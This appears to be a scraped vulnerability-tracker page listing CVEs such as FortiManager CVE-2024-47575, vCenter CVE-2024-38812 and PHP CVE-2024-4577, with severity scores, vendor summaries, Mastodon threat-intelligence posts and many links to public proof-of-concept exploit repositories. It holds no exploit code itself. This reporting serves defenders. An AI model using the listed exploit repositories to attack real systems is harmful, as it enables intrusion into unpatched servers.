https://github.com/hazesecurity/CVE-2024-47575

threatcodex at 2024-11-16T18:05:05.477Z ##

Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575

labs.watchtowr.com/hop-skip-fo

##

screaminggoat at 2024-11-14T16:47:12.554Z ##

watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be exploited in the wild since June) Fortinet FortiManager Missing Authentication Vulnerability

watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.

  • This implies that Fortinet have simply patched the wrong code, in the wrong file, in an entirely different library.
  • While we generally try to resist speculation on the internals of vendor’s development teams, it is very alarming that Fortinet appears to have botched this patch so badly (in our opinion). They have (in our opinion), in essence, patched the wrong code, leaving device administrators with a false sense of security.

##

inw@mastodon.social at 2024-11-20T16:57:35.000Z ##

What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec

labs.watchtowr.com/hop-skip-fo

##

jkmcnk@mastodon.social at 2024-11-14T22:59:38.000Z ##

lol, at this point you should just throw your fortinet devices into a landfill. labs.watchtowr.com/hop-skip-fo

##

GossiTheDog@cyberplace.social at 2024-11-14T22:30:31.000Z ##

FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. labs.watchtowr.com/hop-skip-fo

##

AAKL@infosec.exchange at 2024-11-14T16:57:29.000Z ##

WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 labs.watchtowr.com/hop-skip-fo #cybersecurity #infosec #Fortinet

##

catc0n@infosec.exchange at 2024-11-13T21:00:29.000Z ##

Full Rapid7 analysis and #exploit PoC (with root shell!) for #FortiManager #CVE202447575 via @stephenfewer 🐚 Not a simple project, as it turned out :) attackerkb.com/topics/OFBGprmp

##

screaminggoat@infosec.exchange at 2024-11-13T20:05:14.000Z ##

@wdormann I think you have that confused. CVE-2024-47575 was published on 23 October 2024: infosec.exchange/@screaminggoa

##

CVE-2024-21216
(9.8 CRITICAL)

EPSS: 0.15%

updated 2024-10-17T15:31:09

2 posts

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVS

1 repos

CVE-2024-4131
(7.8 HIGH)

EPSS: 0.04%

updated 2024-10-11T18:32:57

1 posts

A DLL hijack vulnerability was reported in Lenovo Emulator that could allow a local attacker to execute code with elevated privileges.

1 repos

https://github.com/Amal264882/CVE-2024-41312.

admin@mast.hpc.social at 2024-11-20T18:58:00.000Z ##

From the OpenHPC Community project:

Please join the OpenHPC Community BoF at #SC24 in B306 12:15-1:15pm Thur. 21 Nov 2024 for latest details and if you have any questions or suggestions. Members and contributors will also discuss adding Warewulf4 support Wed. 20 Nov 2:30-3:00 PM at CIQ Booth #cve_2024_4131

Look for further information from bsky.app/profile/openhpc.bsky. once they start posting!

##

CVE-2024-43601
(7.1 HIGH)

EPSS: 0.05%

updated 2024-10-08T18:33:29

1 posts

Visual Studio Code for Linux Remote Code Execution Vulnerability

1 repos

screaminggoat@infosec.exchange at 2024-11-08T22:25:06.000Z ##

Microsoft Security Response Center (MSRC) updated the CVSSv3.1 vector string for CVE-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability today:

  • old value: AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
  • new value: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

The previous CVSSv3.1 score was presumably a 7.5 high, and now it's 7.8 base. How they decided that it was a local vector with low attack complexity and no privileges required is beyond me.

#msrc #microsoft #cve_2024_43601 #vulnerability #cve

##

CVE-2024-38813
(7.5 HIGH)

EPSS: 0.09%

updated 2024-10-02T15:31:39

19 posts

The vCenter Server contains a privilege escalation vulnerability. A malicious actor with network access to vCenter Server may trigger this vulnerability to escalate privileges to root by sending a specially crafted network packet.

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

screaminggoat at 2024-11-18T18:00:13.244Z ##

VMware security advisory 11/18 update: VMSA-2024-0019

VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.

cc: @cR0w @ntkramer @dreadpir8robots @campuscodi

##

AAKL@infosec.exchange at 2024-11-20T16:31:34.000Z ##

#CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.

- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability cve.org/CVERecord?id=CVE-2024-

More:

- 2024 CWE Top 25 Most Dangerous Software Weaknesses cisa.gov/news-events/alerts/20

- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication cisa.gov/news-events/alerts/20 @cisacyber #cybersecurity #infosec

##

cisakevtracker@mastodon.social at 2024-11-20T16:00:53.000Z ##

CVE ID: CVE-2024-38813
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Privilege Escalation Vulnerability
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-20T15:44:45.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-38812 (9.8 critical) VMware vCenter Server heap-overflow vulnerability
  • CVE-2024-38813 (7.5 high) VMware vCenter privilege escalation vulnerability

#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity

##

catc0n@infosec.exchange at 2024-11-18T21:49:05.000Z ##

And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. support.broadcom.com/web/ecx/s

##

AAKL@infosec.exchange at 2024-11-18T20:44:11.000Z ##

Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) support.broadcom.com/web/ecx/s

VMSA-2024-0019: Questions & Answers github.com/vmware/vcf-security @vmwaresrc

More: Critical RCE bug in VMware vCenter Server now exploited in attacks bleepingcomputer.com/news/secu @BleepingComputer @serghei #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T18:02:10.000Z ##

@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. support.broadcom.com/web/ecx/s

THE HITS JUST KEEP COMING

##

CVE-2024-38812
(9.8 CRITICAL)

EPSS: 0.09%

updated 2024-10-02T15:30:37

19 posts

The vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

1 repos

https://github.com/groshi/CVE-2024-38812-POC-5-Hands-Private

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

screaminggoat@infosec.exchange at 2024-11-18T18:00:13.000Z ##

VMware security advisory 11/18 update: VMSA-2024-0019

VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.

cc: @cR0w @ntkramer @dreadpir8robots @campuscodi

#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation

##

AAKL@infosec.exchange at 2024-11-20T16:31:34.000Z ##

#CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.

- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability cve.org/CVERecord?id=CVE-2024-

More:

- 2024 CWE Top 25 Most Dangerous Software Weaknesses cisa.gov/news-events/alerts/20

- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication cisa.gov/news-events/alerts/20 @cisacyber #cybersecurity #infosec

##

cisakevtracker@mastodon.social at 2024-11-20T16:05:20.000Z ##

CVE ID: CVE-2024-38812
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Heap-Based Buffer Overflow Vulnerability
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-20T15:44:45.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-38812 (9.8 critical) VMware vCenter Server heap-overflow vulnerability
  • CVE-2024-38813 (7.5 high) VMware vCenter privilege escalation vulnerability

#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity

##

catc0n@infosec.exchange at 2024-11-18T21:49:05.000Z ##

And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. support.broadcom.com/web/ecx/s

##

AAKL@infosec.exchange at 2024-11-18T20:44:11.000Z ##

Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) support.broadcom.com/web/ecx/s

VMSA-2024-0019: Questions & Answers github.com/vmware/vcf-security @vmwaresrc

More: Critical RCE bug in VMware vCenter Server now exploited in attacks bleepingcomputer.com/news/secu @BleepingComputer @serghei #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T18:02:10.000Z ##

@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. support.broadcom.com/web/ecx/s

THE HITS JUST KEEP COMING

##

CVE-2022-46751
(8.2 HIGH)

EPSS: 0.15%

updated 2024-09-30T13:35:28

1 posts

Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy. This issue affects any version of Apache Ivy prior to 2.5.2. When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand a

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-47062
(8.8 HIGH)

EPSS: 0.05%

updated 2024-09-20T22:07:52

1 posts

Security Advisory: Multiple Vulnerabilities in Navidrome. Summary: Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allo

Nuclei template

1 repos

https://github.com/saisathvik1/CVE-2024-47062

DarkWebInformer@infosec.exchange at 2024-11-13T15:59:20.000Z ##

🚨CVE-2024-47062 PoC; SQL Injection Vulnerability in Navidrome

github.com/saisathvik1/CVE-202

##

CVE-2024-45409
(10.0 CRITICAL)

EPSS: 16.41%

updated 2024-09-16T15:29:27

1 posts

Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability was reported by ahacker1 of SecureSAML (ah

Nuclei template

1 repos

https://github.com/synacktiv/CVE-2024-45409

obivan@infosec.exchange at 2024-11-14T11:58:32.000Z ##

Ruby SAML CVE-2024-45409: As bad as it gets and hiding in plain sight workos.com/blog/ruby-saml-cve-

##

CVE-2024-40711
(9.8 CRITICAL)

EPSS: 96.69%

updated 2024-09-09T18:30:30

1 posts

A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).

Nuclei template

2 repos

https://github.com/watchtowrlabs/CVE-2024-40711

https://github.com/realstatus/CVE-2024-40711-Exp

screaminggoat@infosec.exchange at 2024-11-08T17:55:05.000Z ##

Sophos News: VEEAM exploit seen used again with a new ransomware: "Frag"
Sophos X-Ops observed threat activity cluster "STAC 5881" exploiting CVE-2024-40711 to deploy a new ransomware called Frag. They previously deployed Fog or Akira ransomware. No indicators shared.

Reference: CVE-2024-40711 (9.8 critical, disclosed 04 September 2024 by Veeam, has Proof of Concept and vulnerability details, added to CISA KEV Catalog 17 October 2024) Veeam Backup and Replication Deserialization Vulnerability

#akira #fog #ransomware #stac5881 #cybercrime #CVE_2024_40711 #veeam #threatintel #cyberthreatintelligence #cybersecurity #infosec #CTI

##

CVE-2024-42057
(8.1 HIGH)

EPSS: 0.09%

updated 2024-09-03T03:30:40

2 posts

A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an unauthenticated attacker to execute some OS commands on an affected d

screaminggoat@infosec.exchange at 2024-11-19T14:46:29.000Z ##

Sekoia: Helldown Ransomware: an overview of this emerging threat
Sekoia offers a threat actor profile for Helldown ransomware, a relatively new threat actor group performing double extortion (with a data leak site). A potential Zyxel vulnerability that Helldown exploits is CVE-2024-42057 (8.1 high, disclosed 03 September 2024) Zyxel firewall command injection vulnerability. They provide a technical analysis (dynamic and static) of both the Windows and Linux variants of Helldown ransomware. Indicators of compromise are listed.

#Helldown #ransomware #cybercrime #CVE_2024_42057 #zyxel #vulnerability #malwareanalysis #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence

##

CVE-2024-39717
(6.6 MEDIUM)

EPSS: 0.21%

updated 2024-08-27T18:31:36

2 posts

The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin. (Tenant level users do not have this privilege). The “Change Favicon” (Favorite Icon) option can be mis-used to upload a malicious file ending with .png extension to masquerade as image

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2024-5034
(8.8 HIGH)

EPSS: 0.04%

updated 2024-08-01T15:33:03

1 posts

The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

1 repos

alex@bouma.social at 2024-11-19T10:50:25.000Z ##

@valorin I found this one a pretty good summary: blog.nollium.com/cve-2024-5034 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.

##

CVE-2017-0199
(7.8 HIGH)

EPSS: 97.50%

updated 2024-07-24T17:11:35.740000

1 posts

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

26 repos

https://github.com/n1shant-sinha/CVE-2017-0199

https://github.com/nicpenning/RTF-Cleaner

https://github.com/kn0wm4d/htattack

https://github.com/viethdgit/CVE-2017-0199

https://github.com/Phantomlancer123/CVE-2017-0199

https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199

https://github.com/likekabin/CVE-2017-0199

https://github.com/stealth-ronin/CVE-2017-0199-PY-KIT

https://github.com/kash-123/CVE-2017-0199

https://github.com/joke998/Cve-2017-0199

https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-

https://github.com/joke998/Cve-2017-0199-

https://github.com/jacobsoo/RTF-Cleaner

https://github.com/NotAwful/CVE-2017-0199-Fix

https://github.com/haibara3839/CVE-2017-0199-master

https://github.com/SwordSheath/CVE-2017-8570

https://github.com/mzakyz666/PoC-CVE-2017-0199

https://github.com/BRAINIAC22/CVE-2017-0199

https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0

https://github.com/SyFi/cve-2017-0199

https://github.com/Winter3un/cve_2017_0199

https://github.com/Nacromencer/cve2017-0199-in-python

https://github.com/Sunqiz/CVE-2017-0199-reprofuction

https://github.com/ryhanson/CVE-2017-0199

https://github.com/bhdresh/CVE-2017-0199

https://github.com/Exploit-install/CVE-2017-0199

screaminggoat@infosec.exchange at 2024-11-08T14:28:18.000Z ##

Fortinet: New Campaign Uses Remcos RAT to Exploit Victims
A phishing campaign is exploiting CVE-2017-0199 (7.8 high) Microsoft Office and WordPad Remote Code Execution Vulnerability to spread Remcos RAT. Indicators of compromise provided.

#remcosRAT #CVE_2017_0199 #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence #cti

##

CVE-2024-38094
(7.2 HIGH)

EPSS: 4.64%

updated 2024-07-09T18:31:01

1 posts

Microsoft SharePoint Remote Code Execution Vulnerability

catc0n@infosec.exchange at 2024-11-07T14:48:56.000Z ##

@screaminggoat No backchannels, full-on front channels. I messed up and reported this EITW in AttackerKB before the blog was ready to go out. Still accurate info, but I should've waited a few days so there were timely details available to the community along with the EITW report 😅 Lesson learned! attackerkb.com/topics/Ev24ZWs2

##

CVE-2024-4577
(9.8 CRITICAL)

EPSS: 96.32%

updated 2024-06-21T21:35:02

1 posts

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP bina

Nuclei template

54 repos

https://github.com/hexedbyte/cve-2024-4577

https://github.com/AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-

https://github.com/BitMEXResearch/CVE-2024-4577

https://github.com/nemu1k5ma/CVE-2024-4577

https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE

https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK

https://github.com/phirojshah/CVE-2024-4577

https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE

https://github.com/JeninSutradhar/CVE-2024-4577-checker

https://github.com/longhoangth18/CVE-2024-4577

https://github.com/aaddmin1122345/cve-2024-4577

https://github.com/nNoSuger/CVE-2024-4577

https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE

https://github.com/ahmetramazank/CVE-2024-4577

https://github.com/TAM-K592/CVE-2024-4577

https://github.com/zjhzjhhh/CVE-2024-4577

https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP

https://github.com/gotr00t0day/CVE-2024-4577

https://github.com/Sh0ckFR/CVE-2024-4577

https://github.com/0x20c/CVE-2024-4577-nuclei

https://github.com/princew88/CVE-2024-4577

https://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner

https://github.com/xcanwin/CVE-2024-4577-PHP-RCE

https://github.com/Wh02m1/CVE-2024-4577

https://github.com/l0n3m4n/CVE-2024-4577-RCE

https://github.com/dbyMelina/CVE-2024-4577

https://github.com/a-roshbaik/CVE-2024-4577

https://github.com/BTtea/CVE-2024-4577-RCE-PoC

https://github.com/ohhhh693/CVE-2024-4577

https://github.com/Junp0/CVE-2024-4577

https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE

https://github.com/11whoami99/CVE-2024-4577

https://github.com/Chocapikk/CVE-2024-4577

https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template

https://github.com/Sysc4ll3r/CVE-2024-4577

https://github.com/Jcccccx/CVE-2024-4577

https://github.com/AlperenY-cs/CVE-2024-4577

https://github.com/bl4cksku11/CVE-2024-4577

https://github.com/codeb0ss/CVEploiterv2

https://github.com/fa-rrel/CVE-2024-4577-RCE

https://github.com/charis3306/CVE-2024-4577

https://github.com/bughuntar/CVE-2024-4577

https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT

https://github.com/d3ck4/Shodan-CVE-2024-4577

https://github.com/zomasec/CVE-2024-4577

https://github.com/watchtowrlabs/CVE-2024-4577

https://github.com/olebris/CVE-2024-4577

https://github.com/waived/CVE-2024-4577-PHP-RCE

https://github.com/ggfzx/CVE-2024-4577

https://github.com/Entropt/CVE-2024-4577_Analysis

https://github.com/PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough

https://github.com/VictorShem/CVE-2024-4577

https://github.com/manuelinfosec/CVE-2024-4577

https://github.com/taida957789/CVE-2024-4577

CVE-2024-35250
(7.8 HIGH)

EPSS: 0.04%

updated 2024-06-20T18:35:10

2 posts

Windows Kernel-Mode Driver Elevation of Privilege Vulnerability

1 repos

CVE-2024-30103
(8.8 HIGH)

EPSS: 0.09%

updated 2024-06-11T18:30:56

1 posts

Microsoft Outlook Remote Code Execution Vulnerability

CVE-2024-30051
(7.8 HIGH)

EPSS: 0.08%

updated 2024-05-16T20:27:22.830000

1 posts

Windows DWM Core Library Elevation of Privilege Vulnerability

1 repos

https://github.com/fortra/CVE-2024-30051

CVE-2024-4351
(8.8 HIGH)

EPSS: 0.05%

updated 2024-05-16T12:30:29

1 posts

The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account.

1 repos

https://github.com/ZSECURE/CVE-2024-4351

screaminggoat@infosec.exchange at 2024-11-13T18:13:40.000Z ##

ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability

ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.

#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT

##

CVE-2024-3400
(9.8 CRITICAL)

EPSS: 96.41%

updated 2024-04-29T05:02:31

1 posts

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NG

Nuclei template

1 repos

cR0w@infosec.exchange at 2024-11-18T14:07:57.000Z ##

@krypt3ia No kidding. The impact hasn't been as bad, but the communication is so much worse than even the CVE-2024-3400 shitshow. Definitely feels like something's up. Like someone else is using the same vuln and doesn't want access to get burned yet, IDK.

##

CVE-2023-27944
(8.6 HIGH)

EPSS: 0.06%

updated 2024-04-11T21:19:47

1 posts

This issue was addressed with a new entitlement. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. An app may be able to break out of its sandbox

technotenshi@infosec.exchange at 2024-11-08T18:14:14.000Z ##

New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.

jhftss.github.io/A-New-Era-of-

#macOS #Infosec #SandboxEscape #CVE

##

ligniform@infosec.exchange at 2024-11-20T19:38:21.000Z ##

@cR0w This is from a client lol, AlienVault is flagging 127.0.0.0/8 connections as cve-2024-26229 IOCs 🙄

##

oversecurity@mastodon.social at 2024-11-12T16:20:05.000Z ##

Surge in exploits of zero-day vulnerabilities is ‘new normal’ warns Five Eyes alliance

In a co-authored advisory, the agencies list the top 15 most routinely exploited vulnerabilities of 2023, with CVE-2023-3519 — an issue affecting...

🔗️ [Therecord] link.is.it/t2ct9p

##

CVE-2023-32414
(8.6 HIGH)

EPSS: 0.05%

updated 2024-04-04T05:08:19

1 posts

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.4. An app may be able to break out of its sandbox

technotenshi@infosec.exchange at 2024-11-08T18:14:14.000Z ##

New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.

jhftss.github.io/A-New-Era-of-

#macOS #Infosec #SandboxEscape #CVE

##

CVE-2023-27997
(9.8 CRITICAL)

EPSS: 9.72%

updated 2024-04-04T04:45:33

2 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically c

9 repos

https://github.com/imbas007/CVE-2023-27997-Check

https://github.com/TechinsightsPro/ShodanFortiOS

https://github.com/Cyb3rEnthusiast/CVE-2023-27997

https://github.com/rio128128/CVE-2023-27997-POC

https://github.com/puckiestyle/cve-2023-27997

https://github.com/node011/CVE-2023-27997-POC

https://github.com/delsploit/CVE-2023-27997

https://github.com/BishopFox/CVE-2023-27997-check

https://github.com/lexfo/xortigate-cve-2023-27997

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2024-20767
(8.2 HIGH)

EPSS: 11.07%

updated 2024-03-18T12:31:54

2 posts

ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

1 repos

CVE-2023-36328
(9.8 CRITICAL)

EPSS: 0.16%

updated 2024-03-07T18:30:26

1 posts

Integer Overflow vulnerability in mp_grow in libtom libtommath before commit beba892bc0d4e4ded4d667ab1d2a94f4d75109a9, allows attackers to execute arbitrary code and cause a denial of service (DoS).

cR0w@infosec.exchange at 2024-11-15T19:01:00.000Z ##

So AIX 7.2 and 7.3 are vulnerable to CVE-2023-36328 in tcl, a CVSSv3 9.8 RCE per IBM that was initially published over a year ago, and the bulletin didn't come out from IBM until last week? ibm.com/support/pages/security

##

CVE-2024-1212
(10.0 CRITICAL)

EPSS: 91.88%

updated 2024-02-21T18:31:06

4 posts

